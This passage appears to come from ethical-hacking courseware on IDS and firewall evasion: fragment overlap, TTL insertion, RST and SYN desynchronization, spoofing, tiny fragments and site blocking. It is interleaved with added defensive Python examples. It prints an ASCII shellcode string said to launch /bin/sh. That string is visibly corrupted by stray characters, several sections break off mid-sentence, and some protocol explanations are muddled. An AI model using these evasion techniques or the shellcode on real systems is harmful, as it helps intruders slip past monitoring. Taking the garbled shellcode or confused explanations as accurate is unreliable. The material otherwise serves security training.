Overlapping Fragments

Attackers use overlapping fragments to evade IDS. In this technique, attackers generate a series of tiny fragments with overlapping TCP sequence numbers. For example, the initial fragment consists of 100 bytes of payload with the sequence number of 1, the second fragment includes an overlapping sequence of 96 bytes, and so on. At the time of reassembling the packet, the destination host must know how to assemble the overlapping TCP fragments. Some OS will take the original fragments with a given offset (e.g., Windows W2K/XP/2003) and some OS will take the subsequent fragments with a given offset (e.g., Cisco IOS).

Consider a scenario in which the attacker carries out this attack by breaking the packet into four

Figure 12.36: Evading IDS using Overlapping Fragments
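The policy difference described above is what makes overlapping segments dangerous for a NIDS. The following Python example is added here and is not part of the courseware: it reassembles the same two overlapping segments under a keep-original policy and an overwrite policy and shows that the two produce different streams. The segment sizes mirror the 100-byte and 96-byte figures in the text; the policy names, the function names and the sample data are assumptions.

```python
# Added example (not the CEH courseware's code): reassemble the same two
# overlapping segments under two policies and show that they disagree.

def reassemble(segments, policy):
    """Reassemble (seq, data) pairs into one contiguous byte string.

    seq is the relative TCP sequence number of the first byte of data.
    policy "first" keeps bytes already received (the text gives Windows
    2000/XP/2003 as an example); policy "last" lets later data overwrite
    (the text gives Cisco IOS as an example). Both names are assumptions.
    """
    if policy not in ("first", "last"):
        raise ValueError("policy must be 'first' or 'last'")
    stream = {}                      # byte position -> byte value
    for seq, data in segments:       # processed in arrival order
        for i, value in enumerate(data):
            pos = seq + i
            if policy == "last" or pos not in stream:
                stream[pos] = value
    if not stream:
        return b""
    out = bytearray()
    for pos in range(min(stream), max(stream) + 1):
        if pos not in stream:        # stop at the first hole
            break
        out.append(stream[pos])
    return bytes(out)


def policies_disagree(segments):
    """True when the two policies would hand different data to the application."""
    return reassemble(segments, "first") != reassemble(segments, "last")


# Constructed sample mirroring the text: 100 bytes at sequence number 1,
# then a 96-byte segment that overlaps it from sequence number 5 on.
FIRST = (1, b"A" * 100)
SECOND = (5, b"B" * 96)
SAMPLE = [FIRST, SECOND]

if __name__ == "__main__":
    print("keep-original:", reassemble(SAMPLE, "first")[:8], "...")
    print("overwrite    :", reassemble(SAMPLE, "last")[:8], "...")
    print("policies disagree:", policies_disagree(SAMPLE))
```

A sensor that does not know which policy the destination host applies cannot tell which of the two streams the host will process; target-based reassembly, where the sensor is told each protected host's operating system, removes the ambiguity.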
Time-To-Live Attacks

Each IP packet has a field called Time to Live (TTL), which indicates how many hops it can take before a network node discards it. Each router along a data path decrements this value by 1. When the TTL reaches 0, the packet is dropped, and an ICMP alert notification is sent to the sender. Typically, when a host sends a packet, it sets the TTL to a high value such that it can reach its destination under normal circumstances. Different OS use different default initial values for the TTL. Therefore, attackers can guess the number of routers between them and a sending machine, and make assumptions as to what the initial TTL was, thereby guessing which OS a host is running, as a prelude to an attack. To prevent such detection, SmartDefense can change the TTL field of all packets (or all outgoing packets) to a given number. These attacks require the attacker to have prior knowledge of the topology of the victim's network. This information can be obtained using tools such as traceroute, which gives information on the number of routers between the attacker and the victim.

Consider a scenario in which a router is present between the IDS and a victim. Attackers need to acquire this information before launching the TTL attack by breaking the malicious data packet into three fragments. It is assumed that the attacker has prior knowledge about the topology of the target network (i.e., how many routers are there between the attacker and victim machines). The attacker fragments the packet and sends frag-1 with the TTL set to a higher value. It is then received by the victim and the IDS. Then, the attacker sends frag-2' with a false payload and a TTL value of 1, which is received by the IDS; however, the victim will not receive it, because the router discards it when the TTL value is reduced to 0. Next, the attacker sends frag-3 with a correct payload and a higher TTL value, which enables it to reach the IDS and the victim. After receiving frag-3, the IDS performs a TCP reassembly on fragments 1, 2', and 3, and the victim waits for frag-2. Finally, the attacker sends frag-2 with a valid payload. The victim, after receiving frag-2, reassembles fragments 1, 2, and 3 and gets the attack code embedded in a malicious payload. Here, the IDS has only frag-2, as it has already reassembled the fragments and the stream has cleared.
Figure 12.39: Evading IDS using Time-To-Live attack (diagram labels: attacker, fragment dropped at router, correct reassembly)
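A sensor can defend itself against the insertion described above if it knows how many routers lie between it and each protected host and refuses to reassemble fragments that cannot survive that many hops. The Python below is an added example, not code from the courseware; the hop counts, the simplified fragment records (offset is used as an ordinal position rather than the 8-byte unit of the IP header) and the addresses are constructed.

```python
# Added example (not the CEH courseware's code): a TTL-aware fragment filter
# for a NIDS. A fragment whose TTL cannot carry it across the routers between
# the sensor and the protected host is excluded from reassembly, because the
# host will never see it.

from collections import defaultdict

# constructed topology: number of routers between the sensor and each host
HOPS_TO_HOST = {"10.0.0.5": 1, "10.0.0.9": 3}


def can_reach(ttl, hops):
    """Each router decrements TTL and discards the packet when it hits 0,
    so a packet survives `hops` routers only if its TTL is larger than hops."""
    return ttl > hops


def filter_fragments(fragments, hops_to_host):
    """Split observed fragments into those the host can receive and those it cannot.

    fragments: dicts with keys src, dst, id, offset, ttl, payload.
    Returns (accepted, unreachable); the unreachable list is what an attacker
    is trying to insert into the sensor's view only.
    """
    accepted, unreachable = [], []
    for frag in fragments:
        hops = hops_to_host.get(frag["dst"])
        if hops is None or can_reach(frag["ttl"], hops):
            accepted.append(frag)
        else:
            unreachable.append(frag)
    return accepted, unreachable


def reassemble_by_datagram(fragments):
    """Group fragments per (src, dst, id) and join payloads in offset order."""
    groups = defaultdict(list)
    for frag in fragments:
        groups[(frag["src"], frag["dst"], frag["id"])].append(frag)
    result = {}
    for key, frags in groups.items():
        ordered = sorted(frags, key=lambda f: f["offset"])   # stable for ties
        result[key] = b"".join(f["payload"] for f in ordered)
    return result


def _frag(offset, ttl, payload):
    return {"src": "198.51.100.7", "dst": "10.0.0.5", "id": 0x1234,
            "offset": offset, "ttl": ttl, "payload": payload}


# Constructed traffic reproducing the three-fragment scenario: frag-2' arrives
# with TTL 1 and a bogus payload; the real frag-2 follows after frag-3.
SAMPLE = [
    _frag(0, 64, b"GET /"),
    _frag(1, 1, b"bogus"),        # frag-2': one router away, never reaches the host
    _frag(2, 64, b" HTTP/1.0"),
    _frag(1, 64, b"index"),       # frag-2 with the payload the host actually gets
]
STREAM_KEY = ("198.51.100.7", "10.0.0.5", 0x1234)


def host_view(fragments=SAMPLE, hops=HOPS_TO_HOST):
    """What the protected host reassembles, as the sensor should model it."""
    accepted, _ = filter_fragments(fragments, hops)
    return reassemble_by_datagram(accepted)[STREAM_KEY]


def naive_view(fragments=SAMPLE):
    """What a sensor that ignores TTL would reassemble."""
    return reassemble_by_datagram(fragments)[STREAM_KEY]
```

The comparison of `host_view()` with `naive_view()` is the whole point: without the TTL check the sensor inspects a stream containing "bogus" that the host never processes, and the duplicate offset then leaves the real data unexamined.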
Invalid RST Packets

The TCP uses 16-bit checksums for error checking of the header and data and to ensure that communication is reliable. It adds a checksum to every transmitted segment that is checked at the receiving end. When a checksum differs from the checksum expected by the receiving host, the TCP drops the packet at the receiver's end. The TCP also uses an RST packet to end two-way communications. Attackers can use this feature to elude detection by sending RST packets with an invalid checksum, which causes the IDS to stop processing the stream because the IDS thinks that the communication session has ended. However, the end host checks this packet, verifies the checksum value, and then drops the packet if it is invalid.

Some IDS might interpret this packet as an actual termination of the communication and stop reassembling the communication. Such instances allow attackers to continue to communicate with the end host while confusing the IDS, because the end host accepts the packets that follow the RST packet with an invalid checksum value.
Urgency Flag

The urgency flag in the TCP marks data as urgent. TCP uses an urgency pointer that points to the beginning of urgent data within a packet. When the user sets the urgency flag, the TCP ignores all data before the urgency pointer, and the data to which the urgency pointer points is processed. If the URG flag is set, the TCP sets the Urgent Pointer field to a 16-bit offset value that points to the last byte of urgent data in the segment. Some IDS do not consider the TCP's urgency feature and process all the packets in the traffic, whereas the target system processes only the urgent data. Attackers exploit this feature to evade the IDS, as seen in other evasion techniques. Attackers can place garbage data
Polymorphic Shellcode

A signature-based network intrusion detection system (NIDS) identifies an attack by matching attack signatures with incoming and outgoing data packets. Many IDS identify signatures for commonly used strings embedded in the shellcode. Polymorphic shellcode attacks include multiple signatures, making it difficult to detect the signature. Attackers encode the payload using some technique and then place a decoder before the payload. As a result, the shellcode is completely rewritten each time it is sent, thereby evading detection.

With polymorphic shellcodes, attackers hide their shellcode (attack code) by encrypting it with an unknown encryption algorithm and including the decryption code as part of the attack packet. To carry out polymorphic shellcode attacks, they use an existing buffer-overflow exploit and set the "return" memory address on the overflowed stack to the entrance point of the decryption code. This makes it difficult for the IDS to identify it as a shellcode. Therefore, when attackers modify/transform their attacks in this way, the NIDS cannot recognize them. This technique also evades commonly used shellcode strings, thus making shellcode signatures unusable.
ASCII Shellcode

ASCII shellcodes contain only characters from the ASCII standard. Such shellcodes allow attackers to bypass commonly enforced character restrictions within the string input code. They also help attackers bypass IDS pattern matching signatures because they hide strings similarly to polymorphic shellcodes. The IDS pattern matching mechanism does not work efficiently with ASCII values.

Using ASCII for shellcode is very restrictive in that it limits what the shellcode can do under some circumstances, as not all assembly instructions convert directly into ASCII values. This restriction is bypassed using other instructions, or a combination of instructions, which convert to ASCII character representation, serving the same purpose as those instructions that convert improperly.

An ASCII shellcode example is given below:

    char shellcode[] =
    "
    LLLLYhbOpLXSbOpLHSSPPWQPPaPWSUTERDJENStDS|
    a
    YXODka0TkafhN9fYf1LkbOTK
    "DksOtkw3
    fYOLKEOTKgEA'
    |
    r£Y£1LKiOtkkh9Sh8Y1LkmjpYOLKkq0tkrh2wnuX1
    £XODKkxOtkxOtkyCjn¥OLkzCOTk2CCjtxO"
    kz COtkzC}
    3XODKzOTKECOtKzChjG3IY1LKZCCCCO
    k2ChpfcMX1Dk2CCCCOtkzCh4pCnY1Lkz1Tk2CCCC’
    3a
    HIGEXE1Dkz#1 tkzCCjHXODKZCCCC}VYOLKZCCC
    "XODk2COTK2CJWXODK2OTK2C}AXODKZC}XYOLKZOtK―
    "
    gMdgvvn9F1r
    FS Sh@pG9wnuvjrN£rVx2LGkG3IDp£"
    "cM2KgnnJGgbinYshdvb9d"

When executed, the shellcode above runs a "/bin/sh" shell. "bin" and "sh" are contained in the last few bytes of the shellcode.
Application-Layer Attacks

Media files such as images, audios, and videos can be compressed so that they can be rapidly transferred as smaller chunks. Attackers find flaws in this compressed data and perform attacks; even the IDS signatures cannot identify the attack code within data thus compressed.

Many applications that deal with such media files employ some form of compression to increase the data transfer speed. When you find a flaw in these applications, the entire attack can occur within the compressed data, and the IDS will have no way to check the compressed file format for signatures. This enables an attacker to exploit the vulnerabilities in the compressed data. Many IDS look for specific conditions that allow for an attack. However, there are times when the attack can take many different forms. For example, attackers can exploit the integer overflow vulnerabilities using several different integer values. This fact, combined with compressed data, makes signature detection extremely difficult.
Desynchronization

Pre-Connection SYN

This attack is performed by sending an initial SYN before the real connection is established, but with an invalid TCP checksum. The IDS can ignore or accept subsequent SYNs in a connection. If a SYN packet is received after the TCP control block is opened, the IDS resets the appropriate sequence number to match the newly received SYN packet. Attackers send fake SYN packets with a completely invalid sequence number to desynchronize the IDS. This stops the IDS from monitoring all legitimate and attack traffic. If the IDS is smart, it does not check the TCP checksum. If the IDS checks the checksum, the attack is synchronized and a bogus sequence number is sent to the IDS before the real connection occurs.

Post-Connection SYN

In this technique, attackers attempt to desynchronize the IDS from the actual sequence numbers that the kernel is honoring. Send a post-connection SYN packet in the data stream, which will have divergent sequence numbers but otherwise meet all the necessary criteria to be accepted by the target host. However, the target host will ignore this SYN packet, as it references an already established connection. This attack intends to get the IDS to resynchronize its notion of the sequence numbers to the new SYN packet. It will then ignore any data that is a legitimate part of the original stream because it will be waiting for a different sequence number. Once you succeed in resynchronizing the IDS with a SYN packet, send an RST packet with the new sequence number and close down its notion of the connection.
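The invalid-RST trick described earlier and the pre-/post-connection SYN desynchronization above both rely on the IDS believing a segment that the end host will discard. The Python example below is added here and is not the courseware's code: it builds TCP segments with a real RFC 793 checksum over the IPv4 pseudo-header, verifies that checksum before acting on any flag (so a bad-checksum RST or SYN is ignored, exactly as the host ignores it), and refuses to resynchronize on a SYN that arrives for a connection already being tracked. Addresses, ports, the sample traffic and the tracker's state names are constructed.

```python
# Added example (not the CEH courseware's code): TCP checksum verification
# and a one-direction stream tracker that resists invalid-RST and
# pre-/post-connection SYN desynchronization.

import socket
import struct

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def ones_complement_sum(data):
    """RFC 1071 Internet checksum of data (returns 0 when verifying an intact segment)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tcp_checksum(src, dst, segment):
    """Checksum over the IPv4 pseudo-header (src, dst, zero, proto 6, length) plus the segment."""
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, len(segment))
    return ones_complement_sum(pseudo + segment)


def build_segment(src, dst, sport, dport, seq, ack, flags, payload=b"", bad_checksum=False):
    """Constructed 20-byte TCP header plus payload; bad_checksum deliberately corrupts the field."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 8192, 0, 0)
    csum = tcp_checksum(src, dst, hdr + payload)
    if bad_checksum:
        csum = (csum + 1) & 0xFFFF          # off by one: never verifies
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def checksum_ok(src, dst, segment):
    return tcp_checksum(src, dst, segment) == 0


class StreamTracker:
    """Tracks one direction of a TCP stream the way the end host would."""

    def __init__(self, src, dst):
        self.src, self.dst = src, dst
        self.state = "NONE"             # NONE -> SYN_SEEN -> ESTABLISHED -> CLOSED
        self.next_seq = None
        self.data = bytearray()
        self.events = []

    def feed(self, segment):
        if not checksum_ok(self.src, self.dst, segment):
            self.events.append("bad-checksum-ignored")     # host drops it, so do we
            return
        flags = segment[13]
        seq = struct.unpack("!I", segment[4:8])[0]
        payload = segment[20:]
        if flags & SYN:
            if self.state in ("SYN_SEEN", "ESTABLISHED"):
                self.events.append("post-connection-syn-ignored")   # host ignores it too
                return
            self.state, self.next_seq = "SYN_SEEN", seq + 1
            return
        if flags & RST:
            self.state = "CLOSED"
            self.events.append("rst-honored")
            return
        if self.state == "SYN_SEEN" and flags & ACK:
            self.state = "ESTABLISHED"
        if self.state == "ESTABLISHED" and payload and seq == self.next_seq:
            self.data += payload
            self.next_seq += len(payload)


def run_sample():
    """Constructed traffic: handshake, data, a forged RST with a bad checksum,
    a post-connection SYN with a divergent sequence number, then more real data."""
    src, dst = "198.51.100.7", "10.0.0.5"
    tracker = StreamTracker(src, dst)

    def seg(seq, flags, payload=b"", bad=False):
        return build_segment(src, dst, 40000, 80, seq, 0, flags, payload, bad)

    tracker.feed(seg(1000, SYN))
    tracker.feed(seg(1001, ACK))
    tracker.feed(seg(1001, PSH | ACK, b"GET /"))
    tracker.feed(seg(1006, RST | ACK, bad=True))        # invalid RST: keep tracking
    tracker.feed(seg(9999, SYN))                          # post-connection SYN: ignore
    tracker.feed(seg(1006, PSH | ACK, b"admin HTTP/1.0"))
    return tracker
```

The tracker only accepts a RST that verifies, and it only opens a new control block from a SYN when none exists; both decisions mirror what the receiving kernel does, which is the property a sensor needs to stay synchronized with the host.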
Other Types of Evasion

Encryption

Network-based intrusion detection analyzes traffic in the network from the source to the destination. If an attacker succeeds in establishing an encrypted session with his/her target host using a secure shell (SSH), secure socket layer (SSL), or virtual private network (VPN) tunnel, the IDS will not analyze the packets going through these encrypted communications. Thus, an attacker sends malicious traffic using such secure channels, thereby evading IDS security.

Flooding

IDS use resources such as memory and processor speed to analyze the traffic going through them. To bypass IDS security, attackers flood IDS resources with noise or fake traffic to exhaust them with having to analyze flooded traffic. Once such attacks succeed, attackers send malicious traffic toward the target system behind the IDS, which offers little or no intervention. Thus, true attack traffic might go undetected.
Module Flow: Evading Firewalls

The previous section explained how attackers use various techniques to bypass IDS. Similarly, they can also use various tricks and techniques to bypass firewalls. This section discusses the different techniques used by attackers to bypass firewall security.
Firewall Evasion Techniques

Bypassing a firewall is a technique whereby an attacker manipulates the attack sequence to avoid being detected by the underlying firewall. The firewall operates on a predefined set of security rules, and with thorough knowledge and skill, an attacker can bypass the firewall by employing various firewall bypassing techniques. Using these techniques, the attacker tricks the firewall into not filtering the malicious traffic generated by the attacker.

Some firewall bypassing techniques are as follows:

+ Port Scanning
+ Firewalking
+ Banner Grabbing
+ IP Address Spoofing
+ Source Routing
+ Tiny Fragments
+ Using an IP Address in Place of a URL
+ Using Anonymous Website Surfing Sites
+ Using a Proxy Server
+ ICMP Tunneling
+ ACK Tunneling
+ HTTP Tunneling
+ SSH Tunneling
+ DNS Tunneling
+ Through External Systems
+ Through MITM Attack
+ Through Content
+ Through XSS Attack
Firewall Identification

Port Scanning

Ports are points from which computers send or accept information from network resources. Port scanning is used to identify open ports and the services running on these ports. Finding open ports is an attacker's first step toward gaining access to the target system. To do so, the attacker systematically scans the target's ports to identify the versions of services, which helps in finding vulnerabilities in these services. Attackers sometimes use automated port-scanning utilities to do so, many of which are easily available.

How Attackers Scan Ports

Port scanning consists of sending messages to each port, one at a time. The kind of response received indicates whether the system is using the port, leaving it exposed to the discovery of weaknesses. Some firewalls will uniquely identify themselves using simple port scans. For example, Check Point's FireWall-1 listens on TCP ports 256, 257, 258, and 259, and Microsoft's Proxy Server usually listens on TCP ports 1080 and 1745.
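From the defender's side, a sequential sweep of the kind described above leaves a characteristic trace in firewall logs. The following Python example is added here, not taken from the courseware: it parses constructed iptables-style log lines, reports a source that touches many distinct ports on one host within a short window, and separately reports probes of the ports on which the text says FireWall-1 (256 to 259) and Proxy Server (1080, 1745) identify themselves. The log format, the thresholds and the addresses are assumptions.

```python
# Added example (not the CEH courseware's code): port-scan detection over
# constructed firewall log lines.

import re
from collections import defaultdict

# Assumed log line shape: "<epoch> <ACTION> SRC=a.b.c.d DST=a.b.c.d PROTO=TCP SPT=n DPT=n"
LOG_RE = re.compile(
    r"^(?P<ts>\d+) (?P<action>ACCEPT|DROP) SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) "
    r"PROTO=(?P<proto>TCP|UDP) SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)$")

# ports on which the text says specific firewall/proxy products announce themselves
FIREWALL_SELF_PORTS = {256, 257, 258, 259, 1080, 1745}


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["ts"], d["spt"], d["dpt"] = int(d["ts"]), int(d["spt"]), int(d["dpt"])
    return d


def detect_scans(lines, window=60, threshold=10):
    """Map src -> set of probed ports for sources that hit >= threshold distinct
    destination ports on one host within `window` seconds (sliding window)."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    per_pair = defaultdict(list)
    for e in events:
        per_pair[(e["src"], e["dst"])].append((e["ts"], e["dpt"]))
    alerts = {}
    for (src, _dst), hits in per_pair.items():
        lo = 0
        for hi in range(len(hits)):
            while hits[hi][0] - hits[lo][0] > window:
                lo += 1
            ports = {port for _, port in hits[lo:hi + 1]}
            if len(ports) >= threshold:
                alerts.setdefault(src, set()).update(ports)
    return alerts


def firewall_fingerprint_probes(lines):
    """Sources that touched a port on which a firewall or proxy identifies itself."""
    out = defaultdict(set)
    for e in filter(None, map(parse_line, lines)):
        if e["dpt"] in FIREWALL_SELF_PORTS:
            out[e["src"]].add(e["dpt"])
    return dict(out)


def sample_log():
    """Constructed log: one sweep of 12 ports in 12 seconds, two normal HTTPS
    connections, two probes of firewall ports, and one unparsable line."""
    lines = ["%d DROP SRC=203.0.113.9 DST=10.0.0.5 PROTO=TCP SPT=50000 DPT=%d" % (1000 + i, 20 + i)
             for i in range(12)]
    lines += [
        "1000 ACCEPT SRC=10.0.0.20 DST=10.0.0.5 PROTO=TCP SPT=51000 DPT=443",
        "1030 ACCEPT SRC=10.0.0.20 DST=10.0.0.5 PROTO=TCP SPT=51001 DPT=443",
        "1500 DROP SRC=203.0.113.9 DST=10.0.0.1 PROTO=TCP SPT=50001 DPT=256",
        "1501 DROP SRC=203.0.113.9 DST=10.0.0.1 PROTO=TCP SPT=50002 DPT=1080",
        "garbage line that does not parse",
    ]
    return lines
```

The window and threshold are deliberately conservative; a slow scan spread over hours would need a longer window or a per-source cumulative count, at the cost of more false positives from legitimate multi-port clients.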
Firewalking

Firewalking is a method of collecting information about remote networks behind firewalls. It is a technique that uses TTL values to determine gateway ACL filters and map networks by analyzing the IP packet response. It probes ACLs on packet filtering routers/firewalls using the same method as tracerouting. Firewalking involves sending TCP or UDP packets into the firewall where the TTL value is one hop greater than the targeted firewall. If the packet makes it through the gateway, the system forwards it to the next hop, where the TTL equals one, and prompts an ICMP error message at the point of rejection with a "TTL exceeded in transit" message. This method helps locate a firewall; additional probing facilitates fingerprinting and identification of vulnerabilities.

Firewalk is a well-known application used for firewalking. It has two phases: a network discovery phase and a scanning phase. It comes with various open-source Linux distributions. Nmap has a firewalk script that can be used to perform firewalking.

Banner Grabbing

Banners are service announcements provided by services in response to connection requests, and they often carry vendor information. Banner grabbing is a simple method of fingerprinting that helps in detecting the vendor of a firewall and the firmware version. It identifies the service running on the system. Attackers use banner grabbing to fingerprint services and thus discover the services running on firewalls. The three primary services that send out banners are FTP, Telnet, and web servers.

A firewall does not block banner grabbing because the connection between the attacker's system and the target system appears legitimate. An example of SMTP banner grabbing is telnet mail.targetcompany.org 25. The syntax is telnet "<service name> <service ...". If the user types C:\>telnet www.corleone.com 80 and presses Enter a few times, if required, it displays the following result:
IP Address Spoofing

Most firewalls filter packets based on the source IP address. These firewalls examine the source IP address and determine whether the packet is coming from a legitimate source or an illegitimate source. The IDS filters packets from illegitimate sources. Attackers use the IP spoofing technique to bypass such firewalls.

IP address spoofing is a hijacking technique in which an attacker masquerades as a trusted host to conceal his identity, spoof a website, hijack browsers, or gain unauthorized access to a network. In IP spoofing, the attacker creates IP packets by using a forged IP address and gains access to the system or network without authorization. Attackers modify the addressing information in the IP packet header and the source address bits field to bypass the firewall. The attacker spoofs the message; therefore, the destination host thinks that it has come from a reliable source. Thus, the attacker succeeds in impersonating others with the help of IP spoofing. Hackers use this technique to avoid detection during spamming and various other activities.

For example, let us consider three hosts: A, B, and C. Host C is a trusted machine. Host A masquerades as host C by modifying the IP address of the malicious packets that it intends to send to host B. When the packets are received, host B thinks that they are from host C, but they are actually from host A.
Figure 12.40: Evading Firewall using IP Address Spoofing (diagram labels: Host B, Destination Address 10.0.0.1; Source Address 10.0.0.2; Host C: Trusted Machine, 10.0.0.2)
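The Host A/B/C scenario above is defeated at the border by ingress filtering: a packet claiming an internal source address can never legitimately arrive on the external interface, so the firewall drops it before any trust decision is made on the address. The Python below is an added example and not the courseware's code; it applies that rule plus a bogon list in the style of BCP 38. Interface names, prefixes and sample packets are constructed, with 10.0.0.2 standing in for the trusted Host C of the figure.

```python
# Added example (not the CEH courseware's code): ingress (anti-spoofing)
# filtering at a border firewall.

import ipaddress

# constructed policy: which source prefixes may enter on each interface
INTERNAL = [ipaddress.ip_network("10.0.0.0/24")]
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16")]
INGRESS_POLICY = {
    "lan0": INTERNAL,   # internal interface: only our own prefix may source traffic
    "wan0": [],         # external interface: anything except internal/bogon sources
}


def in_any(addr, networks):
    return any(addr in net for net in networks)


def classify(packet, policy=INGRESS_POLICY, internal=INTERNAL, bogons=BOGONS):
    """Return ("accept"|"drop", reason) for a dict with keys iface, src, dst."""
    src = ipaddress.ip_address(packet["src"])
    iface = packet["iface"]
    if iface not in policy:
        return ("drop", "unknown ingress interface %s" % iface)
    allowed = policy[iface]
    if allowed:
        if not in_any(src, allowed):
            return ("drop", "%s is not a valid source on %s" % (src, iface))
        return ("accept", "source belongs to %s" % iface)
    if in_any(src, internal):
        return ("drop", "internal address %s arriving on external %s" % (src, iface))
    if in_any(src, bogons):
        return ("drop", "bogon source %s on %s" % (src, iface))
    return ("accept", "external source")


# constructed packets: the first is Host A on the outside posing as Host C
SAMPLE = [
    {"iface": "wan0", "src": "10.0.0.2", "dst": "10.0.0.1"},
    {"iface": "lan0", "src": "10.0.0.2", "dst": "10.0.0.1"},       # the real Host C
    {"iface": "wan0", "src": "93.184.216.34", "dst": "10.0.0.1"},  # ordinary Internet host
    {"iface": "wan0", "src": "192.168.1.1", "dst": "10.0.0.1"},    # bogon from outside
    {"iface": "lan0", "src": "203.0.113.5", "dst": "10.0.0.1"},    # inside host spoofing outward
]


def filter_packets(packets=SAMPLE):
    return [classify(p)[0] for p in packets]
```

Note that the second rule (an internal host must use an internal address) is egress filtering for the rest of the Internet: it stops this network from being the origin of spoofed traffic aimed elsewhere.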
Source Routing

Using this technique, the sender of the packet designates the route (partially or entirely) that a packet should take through the network such that the designated route should bypass the firewall node. Thus, the attacker can evade firewall restrictions.

When these packets travel through the network nodes, each router examines the destination IP address and chooses the next hop to direct the packet to the destination. In source routing, the sender makes some or all of these decisions on the router.

Source routing is categorized into two approaches: loose source routing and strict source routing. In loose source routing, the sender specifies one or more stages that the packet must go through, whereas in strict source routing, the sender specifies the exact route the packet must go through.

The figure below shows source routing, where the originator dictates the eventual route of the traffic.
Tiny Fragments

Attackers create tiny fragments of outgoing packets, forcing some of the TCP packet's header information into the next fragment. The IDS filter rules that specify patterns will not match with the fragmented packets owing to the broken header information. The attack will succeed if the filtering router examines only the first fragment and allows all the other fragments to pass through. This attack is used to avoid user-defined filtering rules and works when the firewall checks only for the TCP header information.
Figure 12.42: TCP header format (fragment with Offset=0; fields: Source Port, Destination Port, Sequence Number, Acknowledgement Number, Data Offset, Reserved, Window, Checksum, Urgent Pointer=0)
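Both source routing and tiny fragments can be rejected at the IP header before any rule on TCP fields is consulted. The Python example below is added here and is not from the courseware: it parses an IPv4 header including its options, drops datagrams carrying a Loose (type 131) or Strict (type 137) Source Route option, and drops first fragments too small to hold a full TCP header as well as fragments at offset 1, which are the checks RFC 1858 recommends against the tiny-fragment and overlapping-fragment variants. The packet builder and the sample datagrams are constructed; the IP header checksum is not verified here.

```python
# Added example (not the CEH courseware's code): IPv4 header checks a packet
# filter applies before looking at TCP: source-route options and tiny fragments.

import socket
import struct

LSRR, SSRR = 131, 137          # Loose / Strict Source and Record Route option types
MIN_TCP_HEADER = 20


def parse_ipv4(pkt):
    """Return header fields, the list of option types present, and the payload."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, total_len, ident, flags_frag, ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or len(pkt) < ihl:
        raise ValueError("bad header length")
    options, i = [], 20
    while i < ihl:
        kind = pkt[i]
        if kind == 0:                      # End of Option List
            break
        if kind == 1:                      # No Operation (single byte)
            i += 1
            continue
        if i + 1 >= ihl or pkt[i + 1] < 2 or i + pkt[i + 1] > ihl:
            raise ValueError("malformed option")
        options.append(kind)
        i += pkt[i + 1]
    return {
        "ihl": ihl, "ident": ident, "ttl": ttl, "proto": proto,
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "mf": bool(flags_frag & 0x2000),
        "frag_offset": flags_frag & 0x1FFF,          # in 8-byte units
        "options": options,
        "payload": pkt[ihl:total_len] if total_len >= ihl else b"",
    }


def check_packet(pkt):
    """Apply the source-route and tiny-fragment rules; return (verdict, reason)."""
    h = parse_ipv4(pkt)
    if LSRR in h["options"] or SSRR in h["options"]:
        return ("drop", "source-routed datagram")
    if h["proto"] == 6:
        if h["frag_offset"] == 0 and h["mf"] and len(h["payload"]) < MIN_TCP_HEADER:
            return ("drop", "tiny first fragment: TCP header split across fragments")
        if h["frag_offset"] == 1:
            return ("drop", "fragment offset 1 would overwrite the TCP flags")
    return ("accept", "ok")


def build_ipv4(payload, proto=6, mf=False, frag_offset=0, options=b"",
               src="198.51.100.7", dst="10.0.0.5"):
    """Constructed IPv4 header (header checksum left at 0) plus payload."""
    if len(options) % 4:
        options += b"\x00" * (4 - len(options) % 4)
    ihl_words = 5 + len(options) // 4
    flags_frag = (0x2000 if mf else 0) | (frag_offset & 0x1FFF)
    hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl_words, 0,
                      ihl_words * 4 + len(payload), 0x1234, flags_frag, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + options + payload


# constructed samples
TCP_HDR = bytes(20)                                    # stand-in 20-byte TCP header
NORMAL = build_ipv4(TCP_HDR + b"GET / HTTP/1.0\r\n")
TINY_FIRST = build_ipv4(TCP_HDR[:8], mf=True)          # ports and seq only in fragment 0
OFFSET_ONE = build_ipv4(bytes(8), mf=True, frag_offset=1)
LOOSE_SR = build_ipv4(TCP_HDR, options=bytes([LSRR, 7, 4]) + bytes([10, 0, 0, 9]))
NOP_ONLY = build_ipv4(TCP_HDR, options=bytes([1, 1, 1, 0]))
```

The offset-1 rule exists because an 8-byte first fragment can carry the ports and sequence number legitimately, so a second fragment at offset 1 (byte 8) lands exactly on the acknowledgement number and flags and could rewrite them after the filter has already passed the first fragment.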
Bypass Blocked Sites Using an IP Address in Place of a URL

This method involves typing a blocked website's IP address directly in the browser's address bar instead of the domain name. For example, to access Facebook, type its IP address instead of typing its domain name. Use services such as Host2ip to find the IP address of the blocked website. This method fails if the blocking software tracks the IP address sent to the web server.

Figure 12.4: Bypass blocked sites using the IP address instead of the URL
Bypass Blocked Sites Using Anonymous Website Surfing Sites

Anonymous web-surfing sites help to browse the Internet anonymously and unblock blocked sites (i.e., evade firewall restrictions). By using these sites, you can surf restricted sites anonymously without revealing your IP address. Various anonymous web-surfing sites are available, some of which provide options to encrypt website URLs.

